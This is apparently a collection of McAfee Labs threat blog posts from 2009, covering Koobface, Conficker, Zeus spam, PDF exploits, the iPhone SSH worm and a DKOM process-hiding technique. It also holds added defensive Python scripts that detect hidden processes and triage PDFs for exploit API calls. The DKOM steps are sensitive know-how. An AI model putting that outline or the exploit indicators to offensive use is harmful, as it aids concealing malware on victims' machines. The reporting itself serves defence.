Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you. ;)

2010 Predictions: the Year of a Major Social Networking Security Breach?

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

  • Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
  • Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
  • Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
  • HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertently left off the document. Thanks, Pedro!)

(Not So) Happy Holidays from Koobface

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity consists of traffic to compromised servers in order to recruit more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now serving a different purpose.

Holiday Koobface Greetings

When users go to these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Spread of Koobface Holiday Cheer

Stay updated and safe over the holidays!

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

Colon Cleanse IM

This led to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

Colon Cleanse Website

In short order I also received two more IMs. The first was a video (sound familiar???):

Facebook Video IM

This led to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

FaceBook Phishing Page

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

TrustedSource Rep Page

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

Christmas IM Scam

This led to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

Fake Watch Site

I contacted my friend (who was certainly NOT sending the IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Brittany Murphy Searching Dangers

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sites. This has been a well-established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these led to the expected results:

Brittany Murphy SA Result

The SiteAdvisor warning page on it is pretty clear on its intentions:

Brittany Murphy SiteAdvisor Warning Page

Some of the search phrases that are yielding very questionable results are:

Brittany Murphy dies
Brittany Murphy dead
Brittany Murphy husband
Brittany Murphy death hoax
Ashton Kutcher Brittany Murphy
Brittany Murphy 8 mile
Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Conficker Again in the News, Part 2

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

  • A variant: First appeared 21 November 2008
  • B variant: First appeared 29 December 2008
  • C variant: First appeared 20 February 2009
  • D variant: First appeared 4 March 2009
  • E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via the Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Windows Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under the generic top-level domain standard. Then infected machines attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide was infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IPs in their network space:

  • 1086 for the Russian Federation (RU)
  • 597 for the United States (US)
  • 422 for Ukraine (UA)
  • 271 for Romania (RO)
  • 244 for Brazil (BR)
  • 243 for Republic of Korea (KR)
  • 184 for Poland (PL)
  • 166 for Bulgaria (BG)
  • 147 for Europe (EU)
  • 129 for Indonesia (ID)
  • 113 for Japan (JP)
  • 95 for China (CN)
  • 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for causing cyberwarfare that could disrupt not just countries, but the Internet itself.

Conficker Again in the News

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

  • Update your systems to current patch levels
  • Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0” threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Another Adobe Reader Zero-Day Attack

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module was added to the Metasploit framework as well, so it’s only a matter of days until this exploit becomes widespread–as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee FileInsight screenshot

McAfee customers are protected through both the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (“BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment to this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.

DKOM Opens Door to Malware Rootkits

Much malware comes with a kernel rootkit component. Subverting the Windows kernel is indeed the best way to conceal malicious activities on infected systems. To achieve this, many types of malware load malicious device drivers that enjoy full access to all kernel objects. However, this technique is somewhat noisy, and loading a new driver is not really stealthy.

At McAfee Labs we recently ran across a W32/IRCBot.gen.ac sample that uses Direct Kernel Object Manipulation (DKOM) to hide itself without loading a new driver. This technique seems impossible at first sight because modifying kernel memory pages from userland is not allowed. However, W32/IRCBot.gen.ac takes advantage of an undocumented function exported by ntdll.dll that provides debugging functionalities at the kernel level.

NtSystemDebugControl(), despite being undocumented, has been known for many years. It provides simple functions such as reading from and writing to any location within the kernel memory. And this is exactly what a piece of malware needs to manipulate kernel objects.

W32/IRCBot.gen.ac starts by checking what version of Windows it’s running on. This technique won’t work under Windows Vista or Windows 7. If the infected machine is not running Windows XP, W32/IRCBot.gen.ac gives up and doesn’t try to hide itself.

If it does find Windows XP, W32/IRCBot.gen.ac opens the current process’ token to ensure it has the SeDebugPrivilege, which is required to call NtSystemDebugControl().

To find the process list in the kernel memory, W32/IRCBot.gen.ac retrieves the address of the global variable PsInitialSystemProcess, which points to the EPROCESS structure of the system process.

W32/IRCBot.gen.ac can now find the process list in memory and go through it to find its own process. It then removes itself from the process list by calling NtSystemDebugControl() to write to kernel memory.

The malicious process is no longer visible in the Windows Task Manager or other tools such as Process Explorer. However, monitoring TCP connections will quickly reveal the presence of an offending process whose name can’t be found.

Rootkit Detective also detects processes hidden via DKOM.
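The cross-view check described above (a process that owns TCP connections but is missing from the process list), as an added example that is not McAfee code or Rootkit Detective. The `netstat -ano` and `tasklist /FO CSV` text below is constructed to look like Windows XP output; `collect_live()` shows how the same logic would consume real output on a host.

```python
"""Cross-view detection of a DKOM-hidden process: compare the PIDs the
TCP/IP stack reports with the PIDs the process list reports.  Added
example; the sample command output is constructed, not captured."""
import csv
import io
import re
import subprocess  # used only by collect_live(); the demo runs offline

# One `netstat -ano` row: proto, local, foreign, optional state (UDP has
# none), then the owning PID at the end of the line.
NETSTAT_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """Map PID -> list of (proto, local, foreign, state) from `netstat -ano`."""
    owners = {}
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # banner, header and blank lines
        proto, local, foreign, state, pid = m.groups()
        owners.setdefault(int(pid), []).append((proto, local, foreign, state or ""))
    return owners


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /FO CSV`."""
    reader = csv.DictReader(io.StringIO(text))
    return {int(row["PID"]): row["Image Name"] for row in reader}


def hidden_pids(netstat_text, tasklist_text):
    """PIDs that own sockets but are absent from the process list.

    PID 0 is skipped: netstat reports TIME_WAIT sockets under PID 0 once the
    owner has exited.  A process that exits between the two snapshots also
    shows up here, so confirm a hit by sampling twice."""
    owners = parse_netstat(netstat_text)
    visible = parse_tasklist(tasklist_text)
    return {pid: conns for pid, conns in owners.items()
            if pid != 0 and pid not in visible}


def collect_live():
    """Run both commands on a Windows host and apply the check (not run here)."""
    net = subprocess.run(["netstat", "-ano"], capture_output=True,
                         text=True, check=True).stdout
    tl = subprocess.run(["tasklist", "/FO", "CSV"], capture_output=True,
                        text=True, check=True).stdout
    return hidden_pids(net, tl)


# Constructed sample: PID 1540 holds an IRC-style connection (port 6667)
# but has been unlinked from the process list, so tasklist never shows it.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.5:1045       203.0.113.10:6667      ESTABLISHED     1540
  TCP    192.168.1.5:1046       192.168.1.1:80         TIME_WAIT       0
  UDP    0.0.0.0:445            *:*                                    4
"""

TASKLIST_SAMPLE = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System Idle Process","0","Console","0","28 K"
"System","4","Console","0","236 K"
"svchost.exe","812","Console","0","4,964 K"
"explorer.exe","1192","Console","0","18,744 K"
'''

if __name__ == "__main__":
    for pid, conns in hidden_pids(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items():
        print("hidden PID %d owns %s" % (pid, conns))
```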

Accessing kernel memory from userland is really bad, but it appears this hole has been plugged in later versions of Windows. Using this method of calling NtSystemDebugControl() to access kernel memory is not trivial, and we don’t expect this technique to be used widely. And this is a good thing because according to Artemis, Windows XP is still the most widely deployed operating system in corporate environments. My colleagues Igor Muttik and Dmitry Gryaznov, and Joel Yonts of Advanced Auto Parts demonstrated this during McAfee’s Focus 09 conference.

Nevertheless, I offer another reminder that the bad guys never hesitate to exploit any feature, whether documented or not, as long as they can gain control over innocent machines.

Log into privileged user accounts only when required, and keep your anti-virus software up to date!

McAfee Labs Releases December Spam Report

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

  • “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
  • This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
  • One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
  • January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

‘Ho, Ho, Ho’: Santa Delivers FakeAV Presents

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system. Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

H1N1 Vaccination Profile – A path to infection

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

H1N1 Vaccination Profile email claims to be from the CDC.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a URL that points to a website which urges the victim to download a vaccination profile archive:

This website wants to give you a virus.

The link is an executable that installs a VERY recent Zeus Trojan variant. Zeus is an easy-to-use tool for constructing Trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detect this strain (7 of 41 engines detected it according to VirusTotal, and McAfee accounted for 2 of those 7).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicates that most of them were registered with a Belgian registrar, active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar, “Xin Net Technologies”, but the DNS servers themselves are hosted in the US, Japan and Hong Kong. We even see some of the DNS servers in use as having previously been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate that some of the DNS servers themselves may simply be infected hosts.

These hostnames resolve to 135 distinct IP addresses for the websites hosting the Trojan; the addresses are spread all over the world and appear to be DSL accounts.

The primary countries hosting the websites at the time of this writing are Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

Get Rich Quick! Just In Time for the Holidays

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that cyber criminals can take advantage of. Fears of not being able to pay the monthly mortgage, car payments, and backed-up bills, or to provide for your children for the holidays, have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as they try to make ends meet. Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up their sensitive information. In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas”), including get-rich-quick schemes and work-from-home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

Get Rich!

More Getting Rich!!!

Get Rich Tweet!!

As the holiday season progresses, we will see more of these types of scams popping up, with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card! One bit of advice that we ask users to follow: if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing its address into your browser. Do not click on a link in an email or instant message to get you there, because the link might actually be masked to go to a lookalike site set up by cyber criminals to steal your personal information. If the offer that arrived in your inbox is legitimate, it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Koobface Worm Asks for Captcha

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

YouTube

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

Facebook Page

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick the malware uses is that it tries to break Captcha and then uses it to register another Facebook account. The infected machine shows a Captcha window and then tries to deceive the user by showing a shutdown countdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the user’s machine is locked until the Captcha is entered successfully.

Captcha

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):


The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):


This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To get rid of the locked machine, users can follow this process:

  • Press Ctrl+Alt+Del
  • Go to Task Manager
  • Then select Processes
  • In Processes search for RUNDLL32.exe
  • End that process
  • Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes that are running on the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

Curiosity as a Malicious PDF

What would you do if you saw an email in your inbox with a PDF named “U.S. ship thwarts second pirate attack November 18, 2009.pdf”? Would the title pique your curiosity? I hope not enough for you to open the document!

This PDF is the latest in the ugly line of exploit- and malware-ridden embedded PDFs that damage your computer. If you were unfortunate enough to open the file, you’d see what the malware writers expect you to see: a file named “Adobe.pdf” with details on a real story about piracy off the coast of East Africa.

Bogus PDF screenshot

But behind the scenes, sinister things occur. The malicious PDF runs some JavaScript that exploits the Adobe Collab overflow (CVE-2007-5659) and Adobe getIcon (CVE-2009-0927) vulnerabilities. This screenshot shows the beginning of the compressed JavaScript stream:

Malicious JavaScript stream

In addition, two variants of ProcKill-EM are dropped into the Windows system folder, usually C:\Windows\system32.

As always, if you receive a document–PDF or otherwise–from someone you don’t know, don’t open it. And even if you know the document’s sender, scan the file with your anti-virus program with the latest signatures before you open it.

McAfee customers are protected in the 5809 DATs against the threats mentioned above, as Exploit-PDF.aa and ProcKill-EM. Keep your signatures up to date and stay secure!
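A static triage script for the kind of PDF described in this post and in the Adobe Reader zero-day post above: it inflates FlateDecode streams so the compressed JavaScript layer becomes searchable, then looks for script-on-open keys, the Collab API calls named above, and long %u-escaped blobs. Added example, not McAfee or Adobe code; the sample PDF, the heuristics and the placeholder script are constructed for the demonstration.

```python
"""Static triage of a PDF for embedded JavaScript and for the Acrobat APIs
abused by the exploits discussed in these posts (Collab.collectEmailInfo,
Collab.getIcon).  Added example; sample PDF and heuristics are this
example's own."""
import re
import zlib

# Dictionary keys that make a document run script when it is opened.
SCRIPT_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")

# API names from the posts plus the unescape() call used to stage blobs.
SUSPICIOUS_API = ("Collab.collectEmailInfo", "Collab.getIcon", "unescape(")

# One stream object: its dictionary, then the raw body up to "endstream".
STREAM_RE = re.compile(rb"<<([^>]*?)>>\s*stream\r?\n(.*?)\nendstream", re.S)


def inflate_streams(pdf):
    """Yield (dictionary, body) for every stream, inflating FlateDecode
    bodies so the compressed JavaScript layer becomes searchable."""
    for m in STREAM_RE.finditer(pdf):
        dictionary, body = m.group(1), m.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # corrupt or truncated stream: search the raw bytes
        yield dictionary, body


def triage_pdf(pdf):
    """Return the indicators found in a PDF as a dict:
    script_keys: keys that trigger script execution
    apis:        suspicious Acrobat JavaScript calls in any (inflated) stream
    hex_blob:    a long %uXXXX escaped string, the usual shellcode staging
    """
    keys = {k.decode() for k in SCRIPT_KEYS if re.search(rb"%s\b" % k, pdf)}
    apis, hex_blob = set(), False
    for _dictionary, body in inflate_streams(pdf):
        text = body.decode("latin-1")
        apis.update(api for api in SUSPICIOUS_API if api in text)
        if re.search(r"(?:%u[0-9a-fA-F]{4}){16,}", text):
            hex_blob = True
    return {"script_keys": sorted(keys), "apis": sorted(apis), "hex_blob": hex_blob}


def is_suspicious(pdf):
    """Script on open combined with an abused API or a staged blob."""
    r = triage_pdf(pdf)
    return bool(r["script_keys"]) and (bool(r["apis"]) or r["hex_blob"])


def build_sample_pdf(javascript):
    """Constructed minimal PDF whose OpenAction runs a FlateDecode'd script
    (the layout is this example's own, not a real sample)."""
    stream = zlib.compress(javascript.encode())
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /Type /Action /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream)
        + stream + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for num, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed script shaped like the obfuscation layer: filler, not shellcode.
SAMPLE_JS = 'var blob = unescape("' + "%u4141" * 20 + '");\nCollab.getIcon(blob);\n'
SAMPLE_PDF = build_sample_pdf(SAMPLE_JS)
BENIGN_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF), is_suspicious(SAMPLE_PDF))
    print(triage_pdf(BENIGN_PDF), is_suspicious(BENIGN_PDF))
```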

Malicious Java Applet Poses as Carrie Prejean Video

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a feature in Java to social-engineer less tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

  • The bad guys spam a link claiming to be the Carrie Prejean video
  • Then they trick victims into visiting a malicious website, which prompts users into running a Java applet to view the video

The signed applet contains a signature that browsers should verify through a remote, independent certificate-authority server. Once the signature is verified and the user also approves, the signed applet can gain more rights, becoming equivalent to an ordinary application. When the app is injected into a trusted website, users would hardly take the trouble to validate if the certificate is legitimate.

  • At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

This approach is very effective for the following reasons:

  • It’s easier to social-engineer users, as many rich multimedia applications use Java
  • Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
  • The attack is independent of browser type and version
  • The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on VirusTotal, but McAfee detects it with the current DATs as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

Get Out of Jail, Not so Free

Nearly two years ago the first attempt at creating iPhone malware was seen. That was an attack against jailbroken iPhones. This month, although the shenanigans are still targeting jailbroken iPhones, things got a bit more complicated.

Last week saw someone in the Netherlands attempting to extort iPhone owners. The attacker scanned his mobile phone carrier’s network looking for jailbroken iPhones. Once he located a phone running the Secure Shell (SSH) service, he attempted to log in using the default password of the root user account. Instead of quietly taking a look at or copying the user’s SMS messages and emails, he decided to be a nice guy and replace their wallpaper with a demand for €5 (approximately $7) in order to secure their iPhone. His PayPal account was shut down, and he quickly put up instructions for changing the password on his site.

This very week also saw the release of a worm by an Australian malware author using the handle ‘ikee’. It exploits the same root-password vulnerability as that used by the Netherlands attacker. The worm family is now called OSX/RRoll. It’s notable for replacing your wallpaper with an image of Rick Astley and a message from the author. After changing the background image, OSX/RRoll.A-B will delete the binary of the SSH daemon (service) and terminate its process. This serves the dual purpose of closing the hole that allowed infection and preventing reinfection by the worm or other attackers.

OSX/RRoll.A-B Lock Screen image

Background image displayed while the iPhone is locked. (Simulated)

OSX/RRoll.A-B during call image

Background image displayed during a phone call. (Simulated)

Potential Legal Issues

The malware author gave an interview earlier in the week in which he explains that there are four variants in the wild. While he was willing to share the source code with his interviewer, he expressed concern about its public release:

[10:13] <ikee> [...](I don’t know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)

Fortunately the interviewer shortly removed public access to the Google Code project.

The concern shown by ikee is certainly good to see and suggests that perhaps he views malware creation as a bad idea. What is odd is that he doesn’t think he will run into any trouble with the authorities, unlike our friend from the Netherlands.

From ikee’s interview:

[09:39] <JD> Are you aware of the possible legal consequences of this (the [OSX/RRoll worm])? Are you concerned?
[09:40] <ikee> I’d like to think I’m aware, and also I highly doubt I’m in any real trouble (So no not concerned)

It seems Australia actually has a number of laws concerning high-tech crime, and ikee may eventually have a conversation with the Australian Federal Police. But who knows, as I am not a lawyer.

Prevention

OSX/RRoll.A-B only targets jailbroken iPhones on the networks of three mobile carriers in Australia. If you’ve installed the SSH service on your iPhone but neglected to change your root password from the well-known default, you’re likely at risk from attackers.

Users can reduce their risk by:

  • Changing the default root password.
  • Not installing the SSH package if you don’t use it, or uninstalling it.
  • Remembering that modifying your phone’s firmware can sometimes result in software being installed by default or with default settings.

Future threats

The source code for both versions of OSX/RRoll was available from a Google Code project for a little while earlier this week. Once you have working source code for a worm, it can be straightforward to add more malicious actions.

As with the first attempt at iPhone malware, which exploited an installer application for jailbroken iPhones, OSX/RRoll.B exploits the Cydia Installer application. Where the previous Installer application dealt only in free applications developed with the unofficial iPhone SDK, Cydia also provides the ability to buy applications through a Cydia Store. With the possibility of making money (application sales) and possibly lax security (unchanged default root passwords), attackers may see an opportunity in targeting applications like Cydia.

Missing Letter Links Fake AV With Extreme Porn

Today, Microsoft’s Security Intelligence Report is out, and it’s no surprise that it’s littered with fake AV/security product threats: four out of the top five threats in the United States, no less. Let me show you that, with a keen eye and our threat intelligence databases, the same group can be seen to be responsible for a diverse set of criminal activity online, all at the same time.

I’m a little pedantic about the Queen’s English from time to time, and like most people I also make mistakes. However, this little spelling error caught my eye and a quick Google proves it’s gone unnoticed by the owners for quite a while, too.

I was doing a little research into some DSL IPs being abused at the moment and spotted the misspelling acess in this broken English phrase taken from the terms of service of a fake AV website:

“If acess services is unavailable during the subscription period, the member has the right for a refund of subscription fee.”

Google-dorking it with quotes so we get the exact phrase [link] reveals 141 sites that Google knows of. Misspelling access is hardly a crime, but copying the whole phrase is a little odd, isn’t it?

